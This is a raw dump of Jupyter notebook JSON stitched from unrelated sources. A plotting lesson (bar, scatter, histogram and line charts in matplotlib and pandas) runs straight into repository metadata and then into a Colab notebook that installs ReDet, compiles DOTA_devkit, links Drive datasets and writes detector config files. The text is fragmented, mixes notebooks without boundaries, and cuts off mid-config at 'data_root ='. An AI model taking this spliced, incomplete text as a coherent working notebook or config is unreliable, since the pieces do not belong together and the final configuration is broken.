"ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \neaters = {'Cats':6, 'Dogs':5, 'Ferrets':19} # build a data model \nimport matplotlib.pyplot as plt # the python plotting library\n\nflavors = list(ice_cream.keys()) # make a list object based on flavors\ncartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nanimals = list(eaters.keys()) \nbeasts = list(eaters.values()) \nmyfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n\n# Built the plot\nplt.barh(flavors, cartons, color ='orange') \nplt.barh(animals, beasts, color ='green') \nplt.xlabel(\"Flavors\") \nplt.ylabel(\"Counts: Cartons and Beasts\") \nplt.title(\"Current Ice Cream in Storage\") \nplt.show() ",
"_____no_output_____"
]
],
[
[
"---\n\nNow using pandas, we can build bar charts a bit easier.",
"_____no_output_____"
]
],
[
[
"import pandas as pd\n\nmy_data = {\n \"Flavor\": ['Chocolate', 'Strawberry', 'Vanilla'],\n \"Number of Cartons\": [16, 5, 9]\n }\ndf = pd.DataFrame(my_data)\ndf.head()",
"_____no_output_____"
],
[
"df.plot.bar(x='Flavor', y='Number of Cartons', color='magenta' )",
"_____no_output_____"
],
[
"df.plot.bar(x='Flavor', y='Number of Cartons', color=\"red\") # rotate the category labels",
"_____no_output_____"
],
[
"import numpy as np \nimport matplotlib.pyplot as plt \n \n \n# creating the dataset \ndata = {'C':20, 'C++':15, 'Java':30, \n 'Python':35} \ncourses = list(data.keys()) \nvalues = list(data.values()) \n \nfig = plt.figure(figsize = (10, 5)) \n \n# creating the bar plot \nplt.bar(courses, values, color ='maroon', \n width = 0.4) \n \nplt.xlabel(\"Courses offered\") \nplt.ylabel(\"No. of students enrolled\") \nplt.title(\"Students enrolled in different courses\") \nplt.show() ",
"_____no_output_____"
]
],
[
[
"--- \n\n### Scatter Plots\nA scatter plot (also called a scatterplot, scatter graph, scatter chart, scattergram, or scatter diagram) is a type of plot or mathematical diagram using Cartesian coordinates to display values for typically two variables for a set of data. If the points are coded (color/shape/size), one additional variable can be displayed. The data are displayed as a collection of points, each having the value of one variable determining the position on the horizontal axis and the value of the other variable determining the position on the vertical axis.\n\nA scatter plot can be used either when one continuous variable that is under the control of the experimenter and the other depends on it or when both continuous variables are independent. If a parameter exists that is systematically incremented and/or decremented by the other, it is called the control parameter or independent variable and is customarily plotted along the horizontal axis. The measured or dependent variable is customarily plotted along the vertical axis. If no dependent variable exists, either type of variable can be plotted on either axis and a scatter plot will illustrate only the degree of correlation (not causation) between two variables.\n\nA scatter plot can suggest various kinds of correlations between variables with a certain confidence interval. For example, weight and height, weight would be on y axis and height would be on the x axis. \nCorrelations may be positive (rising), negative (falling), or null (uncorrelated). \nIf the pattern of dots slopes from lower left to upper right, it indicates a positive correlation between the variables being studied. \nIf the pattern of dots slopes from upper left to lower right, it indicates a negative correlation. \n\nA line of best fit (alternatively called 'trendline') can be drawn in order to study the relationship between the variables. An equation for the correlation between the variables can be determined by established best-fit procedures. For a linear correlation, the best-fit procedure is known as linear regression and is guaranteed to generate a correct solution in a finite time. No universal best-fit procedure is guaranteed to generate a solution for arbitrary relationships. \nA scatter plot is also very useful when we wish to see how two comparable data sets agree and to show nonlinear relationships between variables.\n\nFurthermore, if the data are represented by a mixture model of simple relationships, these relationships will be visually evident as superimposed patterns.\n\nScatter charts can be built in the form of bubble, marker, or/and line charts.\n\nMuch of the above is verbatim/adapted from: https://en.wikipedia.org/wiki/Scatter_plot\n\nThe example below uses a database table from [galton_subset.csv](http://54.243.252.9/engr-1330-webroot/1-Lessons/Lesson12/galton_subset.csv)",
"_____no_output_____"
]
],
[
[
"# Example 1. A data file containing heights of fathers, mothers, and sons is to be examined\ndf = pd.read_csv('galton_subset.csv')\ndf['child']= df['son'] ; df.drop('son', axis=1, inplace = True) # rename son to child - got to imagine there are some daughters\ndf.head()",
"_____no_output_____"
],
[
"# build some lists\ndaddy = df['father'] ; mommy = df['mother'] ; baby = df['child']",
"_____no_output_____"
],
[
"myfamily = plt.figure(figsize = (10, 10)) # build a square drawing canvass from figure class\nplt.scatter(baby, daddy, c='red') # basic scatter plot\nplt.show()",
"_____no_output_____"
],
[
"# Looks lousy, needs some labels\nmyfamily = plt.figure(figsize = (10, 10)) # build a square drawing canvass from figure class\nplt.scatter(baby, daddy, c='red' , label='Father') # one plot series\nplt.scatter(baby, mommy, c='blue', label='Mother') # two plot series\nplt.xlabel(\"Child's height\")\nplt.ylabel(\"Parents' height\")\nplt.legend()\nplt.show() # render the two plots",
"_____no_output_____"
],
[
"# Repeat in pandas - The dataframe already is built\ndf.plot.scatter(x=\"child\", y=\"father\")",
"_____no_output_____"
],
[
"ax = df.plot.scatter(x=\"child\", y=\"father\", c=\"red\", label='Father')\ndf.plot.scatter(x=\"child\", y=\"mother\", c=\"blue\", label='Mother', ax=ax)\n\nax.set_xlabel(\"Child's height\")\nax.set_ylabel(\"Parents' Height\")",
"_____no_output_____"
],
[
"df.plot.scatter(x=\"child\", y=\"father\")",
"_____no_output_____"
]
],
[
[
"--- \n\n## Histograms\n\nQuoting from https://en.wikipedia.org/wiki/Histogram\n\n\"A histogram is an approximate representation of the distribution of numerical data. It was first introduced by Karl Pearson.[1] To construct a histogram, the first step is to \"bin\" (or \"bucket\") the range of values—that is, divide the entire range of values into a series of intervals—and then count how many values fall into each interval. The bins are usually specified as consecutive, non-overlapping intervals of a variable. The bins (intervals) must be adjacent, and are often (but not required to be) of equal size.\n\nIf the bins are of equal size, a rectangle is erected over the bin with height proportional to the frequency—the number of cases in each bin. A histogram may also be normalized to display \"relative\" frequencies. It then shows the proportion of cases that fall into each of several categories, with the sum of the heights equaling 1.\n\nHowever, bins need not be of equal width; in that case, the erected rectangle is defined to have its area proportional to the frequency of cases in the bin. The vertical axis is then not the frequency but frequency density—the number of cases per unit of the variable on the horizontal axis. Examples of variable bin width are displayed on Census bureau data below.\n\nAs the adjacent bins leave no gaps, the rectangles of a histogram touch each other to indicate that the original variable is continuous.\n\nHistograms give a rough sense of the density of the underlying distribution of the data, and often for density estimation: estimating the probability density function of the underlying variable. The total area of a histogram used for probability density is always normalized to 1. If the length of the intervals on the x-axis are all 1, then a histogram is identical to a relative frequency plot.\n\nA histogram can be thought of as a simplistic kernel density estimation, which uses a kernel to smooth frequencies over the bins. This yields a smoother probability density function, which will in general more accurately reflect distribution of the underlying variable. The density estimate could be plotted as an alternative to the histogram, and is usually drawn as a curve rather than a set of boxes. Histograms are nevertheless preferred in applications, when their statistical properties need to be modeled. The correlated variation of a kernel density estimate is very difficult to describe mathematically, while it is simple for a histogram where each bin varies independently.\n\nAn alternative to kernel density estimation is the average shifted histogram, which is fast to compute and gives a smooth curve estimate of the density without using kernels.\n\nThe histogram is one of the seven basic tools of quality control.\n\nHistograms are sometimes confused with bar charts. A histogram is used for continuous data, where the bins represent ranges of data, while a bar chart is a plot of categorical variables. Some authors recommend that bar charts have gaps between the rectangles to clarify the distinction.\"\n\nThe example below uses a database table from [top_movies.csv](http://54.243.252.9/engr-1330-webroot/1-Lessons/Lesson12/top_movies.csv)",
"_____no_output_____"
]
],
[
[
"import pandas as pd\n\ndf = pd.read_csv('top_movies.csv')\ndf.head()",
"_____no_output_____"
],
[
"df[[\"Gross\"]].hist()",
"_____no_output_____"
],
[
"df[[\"Gross\"]].hist(bins=100)",
"_____no_output_____"
],
[
"df.describe()",
"_____no_output_____"
]
],
[
[
"## Summary\n\n- line charts (previous lesson)\n- bar charts\n- scatterplots\n- histograms\n\n## References\n\n1. Grus, Joel (2015-04-14). Data Science from Scratch: First Principles with Python\n(Kindle Locations 1190-1191). O'Reilly Media. Kindle Edition. \n\n2. Call Expressions in \"Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science\" https://www.inferentialthinking.com/chapters/03/3/Calls.html\n\n3. Functions and Tables in \"Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science\" https://www.inferentialthinking.com/chapters/08/Functions_and_Tables.html\n\n4. Visualization in \"Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science\" https://www.inferentialthinking.com/chapters/07/Visualization.html\n\n5. Documentation; The Python Standard Library; 9. Numeric and Mathematical Modules https://docs.python.org/2/library/math.html\n\n6. https://matplotlib.org/gallery/lines_bars_and_markers/horizontal_barchart_distribution.html?highlight=horizontal%20bar%20chart\n\n7. https://www.geeksforgeeks.org/bar-plot-in-matplotlib/",
"_____no_output_____"
],
[
"## Addendum (Scripts that are Interactive)\n\n:::{note}\nThe addendum is intended for in-class demonstration\n:::",
"_____no_output_____"
]
],
[
[
"# python script to illustrate plotting\n# CODE BELOW IS ADAPTED FROM:\n# Grus, Joel (2015-04-14). Data Science from Scratch: First Principles with Python\n# (Kindle Locations 1190-1191). O'Reilly Media. Kindle Edition. \n#\nfrom matplotlib import pyplot as plt # import the plotting library from matplotlibplt.show()\n\nyears = [1950, 1960, 1970, 1980, 1990, 2000, 2010] # define one list for years\ngdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3] # and another one for Gross Domestic Product (GDP)\nplt.plot( years, gdp, color ='green', marker ='o', linestyle ='solid') # create a line chart, years on x-axis, gdp on y-axis\n # what if \"^\", \"P\", \"*\" for marker?\n # what if \"red\" for color? \n # what if \"dashdot\", '--' for linestyle? \n\n\nplt.title(\"Nominal GDP\")# add a title\nplt.ylabel(\"Billions of $\")# add a label to the x and y-axes\nplt.xlabel(\"Year\")\nplt.show() # display the plot",
"_____no_output_____"
]
],
[
[
"Now lets put the plotting script into a function so we can make line charts of any two numeric lists",
"_____no_output_____"
]
],
[
[
"def plotAline(list1,list2,strx,stry,strtitle): # plot list1 on x, list2 on y, xlabel, ylabel, title\n from matplotlib import pyplot as plt # import the plotting library from matplotlibplt.show()\n plt.plot( list1, list2, color ='green', marker ='o', linestyle ='solid') # create a line chart, years on x-axis, gdp on y-axis\n plt.title(strtitle)# add a title\n plt.ylabel(stry)# add a label to the x and y-axes\n plt.xlabel(strx)\n plt.show() # display the plot\n return #null return",
"_____no_output_____"
],
[
"# wrapper\nyears = [1950, 1960, 1970, 1980, 1990, 2000, 2010] # define two lists years and gdp\ngdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3]\nprint(type(years[0]))\nprint(type(gdp[0]))\nplotAline(years,gdp,\"Year\",\"Billions of $\",\"Nominal GDP\")",
"<class 'int'>\n<class 'float'>\n"
]
],
[
[
"## Example \nUse the plotting script and create a function that draws a straight line between two points.",
"_____no_output_____"
],
[
"```\n def Line():\n from matplotlib import pyplot as plt # import the plotting library from matplotlibplt.show()\n x1 = input('Please enter x value for point 1')\n y1 = input('Please enter y value for point 1')\n x2 = input('Please enter x value for point 2')\n y2 = input('Please enter y value for point 2')\n xlist = [x1,x2]\n ylist = [y1,y2]\n plt.plot( xlist, ylist, color ='orange', marker ='*', linestyle ='solid') \n #plt.title(strtitle)# add a title\n plt.ylabel(\"Y-axis\")# add a label to the x and y-axes\n plt.xlabel(\"X-axis\")\n plt.show() # display the plot\n return #null return\n```",
"_____no_output_____"
],
[
"---\n\n## Laboratory 15\n\n**Examine** (click) Laboratory 15 as a webpage at [Laboratory 15.html](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15.html)\n\n**Download** (right-click, save target as ...) Laboratory 15 as a jupyterlab notebook from [Laboratory 15.ipynb](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15.ipynb)\n",
"_____no_output_____"
],
[
"<hr><hr>\n\n## Exercise Set 15\n\n**Examine** (click) Exercise Set 15 as a webpage at [Exercise 15.html](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15-TH.html)\n\n**Download** (right-click, save target as ...) Exercise Set 15 as a jupyterlab notebook at [Exercise Set 7.1.ipynb](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15-TH.ipynb)\n\n",
"_____no_output_____"
],
[
"## References",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb2b5a37de4e6c5604b24a7437cb7dc35c1c59f4 | 124,627 | ipynb | Jupyter Notebook | train_UCAS_AOD.ipynb | mmoghadam11/ReDet | 917d370c827b65f0dc3618899290fd9288f30f64 | [
"Apache-2.0"
] | 1 | 2021-08-04T11:30:08.000Z | 2021-08-04T11:30:08.000Z | train_UCAS_AOD.ipynb | mmoghadam11/ReDet | 917d370c827b65f0dc3618899290fd9288f30f64 | [
"Apache-2.0"
] | null | null | null | train_UCAS_AOD.ipynb | mmoghadam11/ReDet | 917d370c827b65f0dc3618899290fd9288f30f64 | [
"Apache-2.0"
] | null | null | null | 41.877352 | 230 | 0.435748 | [
[
[
"<a href=\"https://colab.research.google.com/github/mmoghadam11/ReDet/blob/master/train_UCAS_AOD.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"from google.colab import drive\ndrive.mount('/content/drive')",
"_____no_output_____"
],
[
"#باشد tesla t4 باید\n#اگر نبود در بخش ران تایم - منیج سشن - ترمینت شود و از اول کار شروع شود\n!nvidia-smi",
"Fri Sep 10 13:25:32 2021 \n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 470.63.01 Driver Version: 460.32.03 CUDA Version: 11.2 |\n|-------------------------------+----------------------+----------------------+\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|===============================+======================+======================|\n| 0 Tesla K80 Off | 00000000:00:04.0 Off | 0 |\n| N/A 72C P8 32W / 149W | 0MiB / 11441MiB | 0% Default |\n| | | N/A |\n+-------------------------------+----------------------+----------------------+\n \n+-----------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=============================================================================|\n| No running processes found |\n+-----------------------------------------------------------------------------+\n"
]
],
[
[
"# pytorch نصب",
"_____no_output_____"
]
],
[
[
"# !pip install torch=1.3.1 torchvision cudatoolkit=10.0 \n!pip install torch==1.1.0 torchvision==0.3.0",
"_____no_output_____"
]
],
[
[
"# نصب ریپازیتوری",
"_____no_output_____"
]
],
[
[
"# !git clone https://github.com/dingjiansw101/AerialDetection.git\n# !git clone https://github.com/csuhan/ReDet.git\n!git clone https://github.com/mmoghadam11/ReDet.git",
"_____no_output_____"
],
[
"%cd /content/ReDet\n! chmod +rx ./compile.sh\n!./compile.sh",
"_____no_output_____"
],
[
"!python setup.py develop\n# !pip install -e .",
"_____no_output_____"
]
],
[
[
"# نصب DOTA_devkit",
"_____no_output_____"
]
],
[
[
"! apt-get install swig\n%cd /content/ReDet/DOTA_devkit\n!swig -c++ -python polyiou.i\n!python setup.py build_ext --inplace",
"_____no_output_____"
]
],
[
[
"# حال وقت آن است که تصاویری با اندازه ۱۰۲۴*۱۰۲۴ بسازیم و حجم نهیی آن بیش از ۳۵ گیگ خواهد بود",
"_____no_output_____"
],
[
"برای تولید تصاویر بریده شدهی ۱۰۲۴×۱۰۲۴ از فایل زیر استفاده میکنیم\n\n--srcpath مکان تصاویر اصلی\n\n--dstpath مکان تصاویر خروجی\n\n**نکته : در صورت داشتن تصاویر بریده شده اجرای کد زیر نیاز نیست**",
"_____no_output_____"
]
],
[
[
"#آماده سازی dota_1024\n# %cd /content/ReDet\n# %run DOTA_devkit/prepare_dota1.py --srcpath /content/drive/Shareddrives/mahdiyar_SBU/data/dota --dstpath /content/drive/Shareddrives/mahdiyar_SBU/data/dota1024new",
"_____no_output_____"
]
],
[
[
"پس از تولید تصاویر ۱۰۲۴×۱۰۲۴ آنها را به ریپازیتوری پروژه **لینک** میکنیم",
"_____no_output_____"
]
],
[
[
"#برای مدیریت حافظ از سیمبلیک لینک کمک گرفتم\n!mkdir '/content/ReDet/data'\n# !mkdir '/content/AerialDetection/data/dota1_1024'\n# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota1_1024 /content/ReDet/data\n# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota1024new /content/ReDet/data\n# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota_redet /content/ReDet/data\n!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/HRSC2016 /content/ReDet/data\n!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/UCAS-AOD /content/ReDet/data\n!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/UCAS_AOD659 /content/ReDet/data\n\n# !ln -s /content/drive/MyDrive/++ /content/AerialDetection/data/dota1_1024/test1024\n# !ln -s /content/drive/MyDrive/4++/trainval1024 /content/AerialDetection/data/dota1_1024/trainval1024\n\n# !unlink /content/AerialDetection/data/dota1_1024/trainval1024\n!ln -s /content/drive/MyDrive/4++/work_dirs /content/ReDet\n",
"_____no_output_____"
]
],
[
[
"# بررسی حافظه",
"_____no_output_____"
]
],
[
[
"#ممکن است بار اول بعد از ۲ دقیقه خطا دهد. اگر خطا داد دوباره همین دستور اجرا شود (بار دوم خطا نمیدهد)\nimport os\n\n# print(len(os.listdir(os.path.join('/content/ReDet/data/dota1_1024/test1024/images'))))\nprint(len(os.listdir(os.path.join('/content/ReDet/data/dota1024new/test1024/images'))))",
"_____no_output_____"
],
[
"#میتوان فولدر را چک کرد(اختیاری)\n!du -c /content/AerialDetection/data/dota1_1024",
"_____no_output_____"
]
],
[
[
"# نصب mmcv",
"_____no_output_____"
]
],
[
[
"%cd /content/ReDet\n!pip install mmcv==0.2.13 #<=0.2.14\n# !pip install mmcv==0.4.3\n# !pip install mmcv==1.3.9",
"_____no_output_____"
]
],
[
[
"# **configs**",
"_____no_output_____"
],
[
"نکته ی بسیار مهم در کانفیگ مدل ها تایین زمان ثبت چکپوینت هنگام آموزش، مکان دیتاست میباشد",
"_____no_output_____"
],
[
"redet config",
"_____no_output_____"
]
],
[
[
"# %pycat /content/CG-Net/configs/DOTA/faster_rcnn_RoITrans_r101_fpn_baseline.py\n%%writefile /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \n############باید مکان دیتاست و اسم آن در فایل کانفیگ به روز شود در بالای خط دستور تغیر یک خط علامت # گزاشته ام\n\n# model settings\nmodel = dict(\n type='ReDet',\n ############################################################################################################\n # pretrained='work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-12933bc2.pth',\n pretrained='/content/ReDet/work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-25b16846.pth',\n ############################################################################################################\n backbone=dict(\n type='ReResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='ReFPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RiRoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n)\n# dataset settings\ndataset_type = 'DOTADataset'\n########################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/dota1024new/'\n########################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ####################################################################################\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'test1024/DOTA_test1024.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'test1024/images',\n # img_prefix=data_root + 'val1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n ####################################################################################\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=12)\n# yapf:disable\nlog_config = dict(\n interval=50,\n hooks=[\n dict(type='TextLoggerHook'),\n ####################################################################################\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 12\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/ReDet_re50_refpn_1x_dota1'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\n\n############################################################################################\n# map: 0.7625466854468368\n# classaps: [88.78856374 82.64427543 53.97022743 73.99912889 78.12618094 84.05574561\n# 88.03844621 90.88860051 87.78155929 85.75268025 61.76308434 60.39378975\n# 75.9600904 68.06737265 63.59028274]",
"_____no_output_____"
]
],
[
[
"**HRSC2016** ReDet",
"_____no_output_____"
]
],
[
[
"%%writefile /content/ReDet/configs/ReDet/ReDet_re50_refpn_3x_hrsc2016.py\n\n# model settings\nmodel = dict(\n type='ReDet',\n pretrained='/content/ReDet/work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-25b16846.pth',\n backbone=dict(\n type='ReResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='ReFPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=2,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RiRoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=2,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n)\n# dataset settings\ndataset_type = 'HRSCL1Dataset'\n###################################################################################\ndata_root = 